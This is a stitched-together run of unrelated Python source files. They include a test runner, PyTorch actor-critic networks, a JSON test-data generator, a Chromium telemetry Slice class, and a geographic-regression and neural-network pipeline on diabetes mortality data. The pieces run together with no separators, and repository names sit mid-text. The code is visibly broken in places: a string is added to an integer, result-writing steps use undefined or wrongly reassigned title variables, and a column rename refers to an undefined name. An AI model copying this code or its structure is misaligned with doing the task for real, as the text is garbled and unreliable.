''' from .argsparser import is_percentage, is_valid_n, is_positive_int, are_valid_dimensions, is_valid_p, is_time #!/usr/bin/env python ''' Copyright 2016, EMC, Inc Author(s): ''' # set path to common libraries import fit_path # NOQA: unused import import sys import subprocess import fit_common # validate command line args fit_common.mkargs() # Run tests EXITCODE = fit_common.run_nose() exit(EXITCODE) import numpy as np import torch import torch.nn as nn import torch.nn.functional as F def hidden_init(layer): fan_in = layer.weight.data.size()[0] lim = 1. / np.sqrt(fan_in) return -lim, lim class FcNetwork(nn.Module): """Actor (Policy) Model.""" def __init__(self, state_size, action_size, seed, hidden_layers, act_func): """Initialize parameters and build model. Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed hidden_layers: array of dimensions of hidden layers act_func: activation function in layers """ super(FcNetwork, self).__init__() self.seed = torch.manual_seed(seed) self.hidden_layers = nn.ModuleList([nn.Linear(state_size, hidden_layers[0])]) # Add a variable number of more hidden layers layer_sizes = zip(hidden_layers[:-1], hidden_layers[1:]) self.hidden_layers.extend([nn.Linear(h1, h2) for h1, h2 in layer_sizes]) self.batch_norm = nn.ModuleList([nn.BatchNorm1d(d) for d in hidden_layers]) self.output = nn.Linear(hidden_layers[-1], action_size) self.act_func = act_func self.reset_parameters() def reset_parameters(self): for hl in self.hidden_layers: hl.weight.data.uniform_(*hidden_init(hl)) self.output.weight.data.uniform_(-3e-3, 3e-3) class Actor(FcNetwork): """Actor (Policy) Model.""" def __init__(self, state_size, action_size, seed, hidden_layers, act_func=F.relu): """Initialize parameters and build model. Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed hidden_layers: array of dimensions of hidden layers act_func: activation function in layers """ super(Actor, self).__init__(state_size, action_size, seed, hidden_layers, act_func) def forward(self, x): for linear, bn in zip(self.hidden_layers, self.batch_norm): x = self.act_func(bn(linear(x))) x = torch.tanh(self.output(x)) return x class Critic(nn.Module): """Critic (Value) Model.""" def __init__(self, state_size, action_size, seed, hidden_layers, act_func=F.relu): """Initialize parameters and build model. 
Params ====== state_size (int): Dimension of each state action_size (int): Dimension of each action seed (int): Random seed hidden_layers: array of dimensions of hidden layers act_func: activation function in layers """ super(Critic, self).__init__() self.seed = torch.manual_seed(seed) self.batch_norm = nn.ModuleList([nn.BatchNorm1d(d) for d in hidden_layers]) self.hidden_layers = nn.ModuleList([nn.Linear(state_size, hidden_layers[0])]) self.hidden_layers.append(nn.Linear(hidden_layers[0] + action_size, hidden_layers[1])) self.output = nn.Linear(hidden_layers[-1], action_size) self.act_func = act_func self.reset_parameters() def reset_parameters(self): for hl in self.hidden_layers: hl.weight.data.uniform_(*hidden_init(hl)) self.output.weight.data.uniform_(-3e-3, 3e-3) def forward(self, state, action): """Build a critic (value) network that maps (state, action) pairs -> Q-values.""" xs = self.act_func(self.batch_norm[0](self.hidden_layers[0](state))) x = torch.cat((xs, action), dim=1) x = self.act_func(self.batch_norm[1](self.hidden_layers[1](x))) return self.output(x) briyonce/SCWAT #!/usr/bin/env python import json range_n = 100 test_data = { "name" : "test_" + range_n , "children" : [] } print( "creating test data" ) for x in range( range_n ): name_1 = str( x ) child_1 = { "name" : name_1, "children" : [] } for y in range( range_n ): name_2 = str(x) + "_" + str(y) child_2 = { "name" : name_2, "children" : [] } for z in range( range_n ): name_3 = str(x) + "_" + str(y) + "_" + str(z) child_3 = { "name" : name_3, "size" : 100 } child_2[ 'children' ].append( child_3 ) child_1[ 'children' ].append( child_2 ) test_data[ 'children' ].append( child_1 ) print("done creating data") print("storing data in json file....") with open( 'test_' + str(range_n) + '.json', 'w' ) as outfile: json.dump( test_data, outfile, indent = 4 ) print("complete") # Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import telemetry.timeline.event as timeline_event class Slice(timeline_event.TimelineEvent): """A Slice represents an interval of time plus parameters associated with that interval. NOTE: The Sample class implements the same interface as Slice. These must be kept in sync. All time units are stored in milliseconds. """ def __init__(self, parent_thread, category, name, timestamp, duration=0, thread_timestamp=None, thread_duration=None, args=None): super(Slice, self).__init__( category, name, timestamp, duration, thread_timestamp, thread_duration, args) self.parent_thread = parent_thread self.parent_slice = None self.sub_slices = [] self.did_not_finish = False def AddSubSlice(self, sub_slice): assert sub_slice.parent_slice == self self.sub_slices.append(sub_slice) def IterEventsInThisContainerRecrusively(self, stack=None): # This looks awkward, but it lets us create only a single iterator instead # of having to create one iterator for every subslice found. if stack == None: stack = [] else: assert len(stack) == 0 stack.extend(reversed(self.sub_slices)) while len(stack): s = stack.pop() yield s stack.extend(reversed(s.sub_slices)) @property def self_time(self): """Time spent in this function less any time spent in child events.""" child_total = sum( [e.duration for e in self.sub_slices]) return self.duration - child_total @property def self_thread_time(self): """Thread (scheduled) time spent in this function less any thread time spent in child events. 
Returns None if the slice or any of its children does not have a thread_duration value. """ if not self.thread_duration: return None child_total = 0 for e in self.sub_slices: if e.thread_duration == None: return None child_total += e.thread_duration return self.thread_duration - child_total def _GetSubSlicesRecursive(self): for sub_slice in self.sub_slices: for s in sub_slice.GetAllSubSlices(): yield s yield sub_slice def GetAllSubSlices(self): return list(self._GetSubSlicesRecursive()) def GetAllSubSlicesOfName(self, name): return [e for e in self.GetAllSubSlices() if e.name == name] 1-10 # FractureProof ## Version 3 ### Model Script - Mr. FractureProof's Woodcarvings ## Layer Step 1: Geographic Weighted Regression ls1 = 'Step 4: Geographic Weighted Regression' # Step 4 descriptive title m5 = 'Multi-scale Geographic Weighted Regression' # Model 5 descriptive title ### Geojoin predictor and outcome table with polygons, Get centroid from coordinates gdf_XY = gp.read_file(directory + '_shape/' + f4 + '/cb_2018_us_zcta510_500k.shp') # Import dataset saved as csv in _shape folder gdf_XY['ID'] = gdf_XY['ZCTA5CE10'].astype('str') # Change data type of column in data frame gdf_XY['ID'] = gdf_XY['ID'].str.rjust(5, '0') # add leading zeros of character column using rjust() function gdf_XY['ID'] = 'ZCTA' + gdf_XY['ID'] # Combine string with column gdf_XY = gdf_XY.filter(['ID', 'geometry']) # Keep only selected columns gdf_XY = pd.merge(gdf_XY, df_XY, on = 'ID', how = 'inner') # Geojoins can use pandas merge as long as geo data is first passed in function gdf_XY['x'] = gdf_XY['geometry'].centroid.x # Save centroid coordinates as separate column gdf_XY['y'] = gdf_XY['geometry'].centroid.y # Save centroid coordinates as separate column gdf_XY['coordinates'] = list(zip(gdf_XY['x'], gdf_XY['y'])) # Save individual coordinates as column of paired list gdf_XY = gdf_XY.drop(columns = ['x', 'y', 'geometry']) # Drop Unwanted Columns gdf_XY.info() # Get class, memory, and column info: names, data types, obs. ### Setup GWR table gdf_gwr = gdf_XY.set_index('ID') # Set ID column as index wood = gdf_gwr[mrfractureproof].columns.to_list() # Save fractureproof variables as list for GWR wood.append('quant') # Add outcome to list of gwr variables wood.append('coordinates') # Add coordinates to list of gwr variables wood.remove('D2-4_72') # Remove non-significant variables manually wood.remove('D2-4_34') # Remove non-significant variables gdf_gwr = gdf_gwr[wood] # Subset dataframe by sleetced variables gdf_gwr = gdf_gwr.dropna() # Drop all rows with NA values c = list(gdf_gwr["coordinates"]) # save coordinates column as list x = gdf_gwr.drop(columns = ['quant', 'coordinates']).values # save selected features as numpy array y = gdf_gwr['quant'].values # save target as numpy array y = np.transpose([y]) # Transpose numpy array to fit GWR input gdf_gwr.info() # Get class, memory, and column info: names, data types, obs. 
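### Sketch (not part of the original script): the GWR step below calls Sel_BW and
### MGWR, whose import lines are not visible in this excerpt. Assuming they come
### from the open-source mgwr package, the imports would look like this:
# import geopandas as gp            # gp.read_file() is used above for the shapefile
# from mgwr.sel_bw import Sel_BW    # multi-bandwidth selector used in the next step
# from mgwr.gwr import MGWR         # multi-scale GWR estimator used in the next step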
### Create GWR model mgwr_selector = Sel_BW(c, y, x, multi = True) # create model to calibrate selector mgwr_bw = mgwr_selector.search(multi_bw_min = [2]) # search for selectors with minimum of 2 bandwidths, this may take a while mgwr_results = MGWR(c, y, x, mgwr_selector).fit() # fit MGWR model, this may take a while mgwr_results.summary() # Show MGWR summary ### Export GWR results to new table wood.remove('quant') # Remove outcome to list of gwr variables wood.remove('coordinates') # Remove coordinates to list of gwr variables wood = ['Intercept'] + wood # Insert intercept label at front of gwr variable list df_gwr = pd.DataFrame(mgwr_results.params, columns = [wood]) # Create data frame of importances with variables and gini column names gdf_ID = gdf_gwr.reset_index() # Reset index on GWR inputs df_gwr['ID'] = gdf_ID['ID'] # Ad ID column from GWR inputs table df_gwr.info() # Get class, memory, and column info: names, data types, obs. ### Join first and second geographic layer lables df_layer = pd.read_csv('_data/FIPS_ZCTA_key.csv') # Import layer key dataset saved as csv in _data folder df_layer = df_layer.filter(['FIPS', 'ZCTA']) # Keep only selected columns df_layer = df_layer.rename(columns = {ID: 'ID', 'FIPS': 'ID_2'}) # Rename geographic identifiers as standard features gdf_ID_2 = gdf_gwr.reset_index() # Reset Index as second geographic layer ID adn save as gdf for later df_gwr = pd.merge(gdf_gwr, df_layer, on = 'ID', how = 'left') # Join zip code geo weighted coefficients to county labels df_gwr = df_gwr.dropna() # Drop all rows with NA values df_gwr = df_gwr.set_index('ID') # Set first layer ID column as index df_gwr = df_gwr.drop(columns = ['coordinates', 'quant']) # Drop Unwanted Columns df_gwr = df_gwr.groupby(['ID_2'], as_index = False).mean() # Group 1st layer GWR coefficents by 2nd layer identifiers and calculate average df_gwr.info() # Get class, memory, and column info: names, data types, obs. ### Create Multi-level categories based bandwidths df_bw = df_gwr.drop(columns = ['ID_2']) # Drop Unwanted Columns df_bw = df_bw.apply(st.zscore).abs() # Calculate absolute value of z-score for mean GWR coefficients in second layer df_bw['ID_2'] = df_gwr['ID_2'] # Save second layer identifiers from GWR dataset df_bw = df_bw.set_index('ID_2') # Set second layer identifiers as index bw = df_bw.idxmax(axis = 1) # Get second layer identifiers that have highest absolute value of z score l_bw = list(zip(df_bw.index, bw)) # Create list of variables alongside RFE value df_bw = pd.DataFrame(l_bw, columns = ['ID_2', 'multi']) # Create data frame of 1st layer features and 2nd layer identifiers df_bw['multi'] = df_bw['multi'].astype('category') # Save features as multi-level categoriacl variable with standard name df_bw['multi'] = df_bw['multi'].cat.codes # Convert string lable into numeric codes df_bw.info() # Get class, memory, and column info: names, data types, obs. 
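### Illustrative sketch (toy data, not part of the original pipeline): the z-score /
### idxmax pattern above picks, for each 2nd-layer unit, the coefficient column with
### the largest absolute z-score. The names and values below are hypothetical.
toy = pd.DataFrame({'a': [1.0, 5.0, 3.0], 'b': [4.0, 1.0, 1.0]}, index = ['c1', 'c2', 'c3']) # Toy coefficient table
toy_dominant = toy.apply(st.zscore).abs().idxmax(axis = 1) # Column with largest |z| per row: c1 -> 'b', c2 -> 'a', c3 -> 'b'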
### Append step 4 results to corresponding text file text_file = open('_results/' + label + '.txt', 'a') # Write new corresponding text file text_file.write(s4 + '\n\n') # Step title text_file.write('Models: ' + m5 + '\n\n') # Model title text_file.write('Bandwidths: ' + str(mgwr_bw) + '\n\n') # Result description, result list text_file.write('Mean Coefficients by County: ' + '\n\n') # Result description text_file.write(str(df_gwr.describe()) + '\n\n') # Result descriptive statistics text_file.write('####################' + '\n\n') # Add section break for end of step text_file.close() # Close file ## Step 5: Data Processing of 2nd Geographic Layer ls5 = 'Step 5: Raw Data Processing and Feature Engineering (2nd Geographic Layer)' # Step 5 descriptive title d3 = 'Health Resources and Servcies Administration Area Heath Resource File Populaton Rates by County 2014-2018 5-year Average' # Dataset 3 descriptive title ### Preprocess Third Dataset df_d3 = pd.read_csv('_data/' + f3 + '_stage.csv') # Import third dataset saved as csv in _data folder df_d3 = df_d3.rename(columns = {'FIPS': 'ID_2'}) # Apply standard name to identifier used for joining 2nd layer datasets df_d3.info() # Get class, memory, and column info: names, data types, obs ### Join Datasets by second layer identifier and define targets df_XY_2 = pd.merge(df_d3, df_bw, on = 'ID_2', how = 'inner') # Join datasets to create table with predictors and outcome df_XY_2.info() # Get class, memory, and column info: names, data types, obs. ### Create second layer outcome table df_Y_2 = df_XY_2.filter(['multi', 'ID_2']) # Create Outcome table for second layer df_Y_2 = df_Y_2.set_index('ID_2') # Set second layer identifier as index df_Y_2.info() # Get class, memory, and column info: names, data types, obs. ### Create second layer standard scaled predictor table df_X_2 = df_XY_2.drop(columns = ['multi', 'ID_2']) # Drop Unwanted Columns df_X_2 = df_X_2.replace([np.inf, -np.inf], np.nan) # Replace infitite values with NA df_X_2 = df_X_2.dropna(axis = 1, thresh = 0.75*len(df_X_2)) # Drop features less than 75% non-NA count for all columns df_X_2 = pd.DataFrame(SimpleImputer(strategy = 'median').fit_transform(df_X_2), columns = df_X_2.columns) # Impute missing data df_X_2 = pd.DataFrame(StandardScaler().fit_transform(df_X_2.values), columns = df_X_2.columns) # Standard scale values by converting the normalized features into a tabular format with the help of DataFrame. df_X_2['ID_2'] = df_XY_2['ID_2'] # Save ID as column in predictor table df_X_2 = df_X_2.set_index('ID_2') # Set identifier as index df_X_2.info() # Get class, memory, and column info: names, data types, obs. 
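### Sketch (toy data, not part of the original pipeline): dropna(axis = 1, thresh = k)
### keeps only columns with at least k non-NA values, which is how the 75% completeness
### rule above works. The frame below is hypothetical.
toy_na = pd.DataFrame({'keep': [1.0, 2.0, 3.0, 4.0], 'drop': [1.0, np.nan, np.nan, np.nan]}) # One mostly-missing column
toy_na = toy_na.dropna(axis = 1, thresh = 0.75 * len(toy_na)) # Needs >= 3 non-NA values, so only 'keep' survives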
### Append step 5 results to corresponding text file text_file = open('_results/' + label + '.txt', 'a') # Write new corresponding text file text_file.write(s5 + '\n\n') # Step descriptive title text_file.write(d3 + '\n') # Dataset descriptive title text_file.write('Target labels: multi = selected varibles from step 2 with highest average absolute value of z-score by identifier' + '\n') # Dataset methods description text_file.write('Target processing: None' + '\n\n') # Dataset methods description text_file.write(str(df_Y_2.describe()) + '\n\n') # Result summary text_file.write('Feature labels: AHRF Population Rates' + '\n') # Dataset methods description text_file.write('Feature processing: 75% nonNA, Median Imputed NA, Standard Scaled' + '\n\n') # Dataset methods description text_file.write('Rows, Columns: ' + str(df_X_2.shape) + '\n\n') # Result description and result list text_file.write('####################' + '\n\n') # Add section break for end of step text_file.close() # Close file ## Step 6: Identify 2nd Layer Predictors s5 = 'Step 6: Identify 2nd Layer Predictors' # Step 6 descriptive title m6 = 'Support Vector Machines' # Model 6 descriptive title ### Support Vector Machines vector = LinearSVC() # Support vector machines with a linear kernel for multi-level categorical outrcomes vector.fit(df_X_2, df_Y_2['multi']) # fit model svm = vector.coef_ # Save coefficients for each category by feature df_svm = pd.DataFrame(svm, columns = df_X_2.columns, index = [fractureproof]) # Create data frame of coefficients by 2nd layer features and 1st layer features df_svm = df_svm.abs() # Get absolute value of all coefficients svm_max = df_svm.idxmax(axis = 1) # Get 2nd layer features that have highest values for each 1st layer feature l_svm_max = list(zip(df_svm.index, svm_max)) # Create list of 2nd layer features along 1st layer features df_svm_max = pd.DataFrame(l_svm_max, columns = ['GWR', 'Feature']) # Create data frame of 2nd layer features along 1st layer features carving = df_svm_max['Feature'].unique() # Print unique values in column to remove duplicate 2nd layer features and save as list df_svm_max.info() # Get class, memory, and column info: names, data types, obs. ### Principal Component Analysis degree = len(df_X_2[carving].columns) - 1 # Save number of features -1 to get degrees of freedom pca = PCA(n_components = degree) # Pass the number of components to make PCA model based on degrees of freedom pca.fit(df_X_2[carving]) # Fit initial PCA model ### Variance ratios and component Loadings cvr = pca.explained_variance_ratio_.cumsum() # Save cumulative variance ratio comps = np.count_nonzero(cvr) - np.count_nonzero(cvr > 0.95) + 1 # Save number of components above threshold value load = pca.components_.T * np.sqrt(pca.explained_variance_) # Export component loadings df_load = pd.DataFrame(load, index = df_X_2[carving].columns) # Create data frame of component loading df_load = df_load.iloc[:, 0:comps] # Save columns by components above threshold df_load = df_load.abs() # get absolute value for column or data frame df_load = df_load[df_load > 0.5] # Subset by character df_load = df_load.dropna(thresh = 1) # Drop all rows without 1 non-NA value df_load = df_load.dropna(axis = 'columns', thresh = 1) # Drop all rows without 1 non-NA value woodcarving = df_load.index.to_list() # Save final set of 2nd layer features to list df_load.info() # Get class, memory, and column info: names, data types, obs. 
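### Sketch (toy numbers, not part of the original pipeline): how the component count
### above follows from the cumulative variance ratio. With the hypothetical cvr below,
### two entries exceed 0.95, so comps = 4 - 2 + 1 = 3, i.e. every component up to and
### including the first one that crosses the 95% threshold.
toy_cvr = np.array([0.60, 0.80, 0.96, 1.00]) # Toy cumulative variance ratio
toy_comps = np.count_nonzero(toy_cvr) - np.count_nonzero(toy_cvr > 0.95) + 1 # Evaluates to 3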
### Add 2nd layer feature labels df_l3 = pd.read_csv('_data/' + f3 + '_labels.csv') # Import dataset saved as csv in _data folder df_l_3 = df_l3.filter(['Feature', 'Label']) # Keep only selected columns df_l_3 = df_l_3.set_index('Feature') # Set column as index df_l_3 = df_l_3.transpose() # Switch rows and columns df_lwc = df_l_3[woodcarving] # Subset by 2nd layer selected featres df_lwc = df_lwc.transpose() # Switch rows and columns df_lwc = df_lwc.reset_index() # Reset index l_lwc = list(zip(df_lwc['Feature'], df_lwc['Label'])) # Create list of variables alongside RFE value df_lwc.info() # Get class, memory, and column info: names, data types, obs. ### Append step 6 results to corresponding text file text_file = open('_results/' + label + '.txt', 'a') # Write new corresponding text file text_file.write(s6 + '\n\n') # Step description text_file.write('Models: ' + m5 + '\n\n') # Model description text_file.write('Values: Coefficients' + '\n') # Model methods description text_file.write('Thresholds: Max Absolute Value' + '\n\n') # Model methods description text_file.write(str(df_svm_max) + '\n\n') # Result dataframe text_file.write('Models: ' + m1 + '\n\n') # Model description text_file.write('Cumulative Variance: Threshold = 95%' + '\n') # Model methods description text_file.write(str(cvr) + "\n\n") # Result object text_file.write('Component Loadings' + '\n') # Result description text_file.write(str(df_load) + '\n\n') # Result dataframe text_file.write('Final List of selected 2nd layer features' + '\n') # Result description text_file.write(str(l_lwc) + '\n\n') # Result list text_file.write('####################' + '\n\n') # Add section break for end of step text_file.close() # Close file ## Step 7: Create Informative Prediction Model with both geographic layers s7 = 'Step 7: Create Informative Preidction Model with both geographic layers' # Step 1 descriptive title ### Join Datasets by ID and define targets df_XY_f = pd.merge(df_XY_2, df_layer, on = 'ID_2', how = 'left') # Join datasets to create table with predictors and outcome df_XY_f = pd.merge(df_XY, df_XY_f, on = 'ID', how = 'inner') # Join datasets to create table with predictors and outcome df_XY_f = df_XY_f.drop(columns = ['ID_2', 'multi']) # Drop Unwanted Columns df_XY_f = df_XY_f.dropna(subset = ['quant']) # Drop all outcome rows with NA values df_XY_f.info() # Get class, memory, and column info: names, data types, obs. 
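### Note (sketch, not part of the original script): statsmodels OLS fits without an
### intercept unless a constant column is added explicitly, so the regression in the
### step below is a no-intercept model. If an intercept were wanted, the usual pattern is:
# X_const = sm.add_constant(X) # Hypothetical name; appends a 'const' column of ones
# res_with_intercept = sm.OLS(Y, X_const).fit() # Same call as below, but with the constant included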
### Create Multiple Regression Model mrfractureproofswoodcarvings = mrfractureproof + woodcarving # Combine 2nd layer slected features with first layer regression model features mrfractureproofswoodcarvings.append('quant') # Remove outcome from 1st and 2nd layer regression feature list df_mrfpwc = df_XY_f[mrfractureproofswoodcarvings] # Subset full dataframe with 1st and 2nd layer regression model features df_mrfpwc = df_mrfpwc.dropna() # Drop all NA values from subset dataframe X = df_mrfpwc.drop(columns = ['quant']) # Create dataframe of predictors Y = df_mrfpwc['quant'] # Create dataframe of outcomes mod_f = sm.OLS(Y, X) # Create linear model res_f = mod_f.fit() # Fit model to create result res_f.summary() # Print results of regression model ### Add feature labels df_lf = pd.concat([df_l1, df_l2, df_l3]) # Combine rows with same columns df_lf = df_lf.filter(['Feature', 'Label']) # Keep only selected columns df_lf = df_lf.set_index('Feature') # Set column as index df_lf = df_lf.transpose() # Switch rows and columns mrfractureproofswoodcarvings.remove('quant') # Remove outcome from 1st and 2nd layer regression feature list df_lmfpwc = df_lf[mrfractureproofswoodcarvings] # Save chosen featres as list df_lmfpwc = df_lmfpwc.transpose() # Switch rows and columns df_lmfpwc = df_lmfpwc.reset_index() # Reset index l_lmfpwc = list(zip(df_lmfpwc['Feature'], df_lmfpwc['Label'])) # Create list of variables alongside RFE value df_lmfpwc.info() # Get class, memory, and column info: names, data types, obs. ### Append step 7 results to corresponding text file text_file = open(path + name + "_" + day + ".txt", "a") # Open corresponding text file text_file.write(s7 + "\n\n") # Step description text_file.write(d1 + '\n') # Dataset description text_file.write(d2 + '\n') # Dataset description text_file.write(d3 + '\n\n') # Dataset description text_file.write('Target labels: quant = Diabetes Related (K00-K99) Raw Mortality Rate per 1000k' + '\n') # Target labels text_file.write('Target processing: None' + '\n\n') # Result description text_file.write(str(df_XY_f['quant'].describe()) + '\n\n') # Result summary text_file.write('Features labels: ACS Percent Estimates' + '\n') # Dataset methods description text_file.write('Feature processing: 75% nonNA, Median Imputed NA, Standard Scaled' + '\n\n') # Dataset methods description text_file.write('Rows, Columns: ' + str(df_XY_f.shape) + '\n\n') # Result description and result dataframe text_file.write("Models: " + m4 + "\n\n") # Model description text_file.write(str(res_f.summary()) + "\n\n") # Result summary text_file.write('Final List of selected 1st and 2nd layer features' + '\n') # Result description text_file.write(str(l_lmfpwc) + "\n\n") # Result list text_file.write("####################" + "\n\n") # Add section break for end of step text_file.close() # Close file ## Step 8: Predict Binary Outcome with Artificial Neural Networks s8 = 'Step 8: Predict Categorical targets with Artificial Neural Networks' m7 = 'Multi-Layer Perceptron' ### Create outcome table and define targets df_Y_f = df_XY_f.filter(['quant', 'ID']) # Create Outcome table df_Y_f['binary'] = np.where(df_Y_f['quant'] > df_Y_f['quant'].quantile(0.5), 1, 0) # Create binary outcome based on conditions df_Y_f = df_Y_f.set_index('ID') # Set identifier as index df_Y_f.info() # Get class, memory, and column info: names, data types, obs. 
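### Sketch (toy data, not part of the original pipeline): the median split used in the
### outcome table above labels rates strictly greater than the 50th percentile as 1 and
### everything else (including the median itself) as 0. The series below is hypothetical.
toy_rates = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0]) # Toy mortality rates
toy_binary = np.where(toy_rates > toy_rates.quantile(0.5), 1, 0) # -> [0, 0, 0, 1, 1]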
### Create standard scaled predictor table df_X_f = df_XY_f.drop(columns = ['quant', 'ID']) # Drop Unwanted Columns df_X_f = df_X_f.replace([np.inf, -np.inf], np.nan) # Replace infitite values with NA df_X_f = df_X_f.dropna(axis = 1, thresh = 0.75*len(df_X_f)) # Drop features less than 75% non-NA count for all columns df_X_f = pd.DataFrame(SimpleImputer(strategy = 'median').fit_transform(df_X_f), columns = df_X_f.columns) # Impute missing data df_X_f = pd.DataFrame(StandardScaler().fit_transform(df_X_f.values), columns = df_X_f.columns) # Standard scale values by converting the normalized features into a tabular format with the help of DataFrame. df_X_f['ID'] = df_XY_f['ID'] # Save ID as column in predictor table df_X_f = df_X_f.set_index('ID') # Set identifier as index df_X_f.info() # Get class, memory, and column info: names, data types, obs. ### Save FractureProof and Woodcarving feature list mrfractureproofscontemplativewoodcarvings = mrfractureproof + woodcarving # Combine 2nd layer slected features with first layer regression model features ### Multi-Layered Perceptron with all predictors from all layers Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f # Save all predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 50 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_a = auc(fpr, tpr) # Plot ROC and get AUC score e_a = epochs # Save epochs used for mlp print(auc_a) # Display object ### Multi-Layered Perceptron with Mr. 
Fracture Proof predictors Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f[mrfractureproof] # Save selected predictors from all layers predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 500 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_mrfp = auc(fpr, tpr) # Plot ROC and get AUC score e_mrfp = epochs # Save epochs used for mlp print(auc_mrfp) # Display object ### Multi-Layered Perceptron with Woodcarving predictors Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f[woodcarving] # Save selected predictors from all layers predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 500 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_wc = auc(fpr, tpr) # Plot ROC and get AUC score e_wc = epochs # Save epochs used for mlp print(auc_wc) # Display object ### Multi-Layered Perceptron with Mr. 
Fracture Proof's Contemplative Woodcarving predictors Y = df_Y_f.filter(['binary']) # Save binary outcome as MLP Input X = df_X_f[mrfractureproofscontemplativewoodcarvings] # Save selected predictors from all layers predictors as MLP input X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.50) # Random 50/50 Train/Test Split input = X.shape[1] # Save number of columns as input dimension nodes = round(input / 2) # Number of input dimensions divided by two for nodes in each layer epochs = 500 network = Sequential() # Build Network with keras Sequential API network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal', input_dim = input)) # First dense layer network.add(Dense(nodes, activation = 'relu', kernel_initializer = 'random_normal')) # Second dense layer network.add(Dense(1, activation = 'sigmoid', kernel_initializer = 'random_normal')) # Output layer with binary activation network.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Compile network with Adaptive moment estimation, and follow loss and accuracy final = network.fit(X_train, Y_train, batch_size = 10, epochs = epochs) # Fitting the data to the train outcome, with batch size and number of epochs Y_pred = network.predict(X_test) # Predict values from test data Y_pred = (Y_pred > 0.5) # Save predicted values close to 1 as boolean Y_test = (Y_test > 0.5) # Save test values close to 1 as boolean fpr, tpr, threshold = roc_curve(Y_test, Y_pred) # Create ROC outputs, true positive rate and false positive rate auc_mrfpctwc = auc(fpr, tpr) # Plot ROC and get AUC score e_mrfpctwc = epochs # Save epochs used for mlp print(auc_mrfpctwc) # Display object ### Append step 8 results to corresponding text file text_file = open(path + name + '_' + day + '.txt', 'a') # Open corresponding text file text_file.write(s8 + '\n\n') # Step description text_file.write(d1 + '\n') # Dataset description text_file.write(d2 + '\n') # Dataset description text_file.write(d3 + '\n\n') # Dataset description text_file.write('Target labels: binary = Diabetes Related (K00-K99) Raw Mortality Rate per 1000k above 50% percentile' + '\n') # Target labels text_file.write('Target processing: train, test random 50-50 split' + '\n\n') # Model methods description text_file.write(m7 + '\n') # Model description text_file.write('Layers: Dense, Dense, Activation' + '\n') # Model methods description text_file.write('Functions: ReLU, ReLU, Sigmoid' + '\n') # Model methods description text_file.write('All features, all layers: AUC = ' + str(auc_a) + ', Epochs = ' + str(e_a) + '\n') # Result description and result dataframe text_file.write('Fractureproof Features: AUC = ' + str(auc_mrfp) + ', Epochs = ' + str(e_mrfp) + '\n') # Result description and result dataframe text_file.write('Woodcarving Features: AUC = ' + str(auc_wc) + ', Epochs = ' + str(e_wc) + '\n') # Result description and result dataframe text_file.write('Mr. Fracture Proofs Woodcarving Features: AUC = ' + str(auc_mrfpctwc) + ', Epochs = ' + str(e_mrfpctwc) + '\n\n') # Result description and result 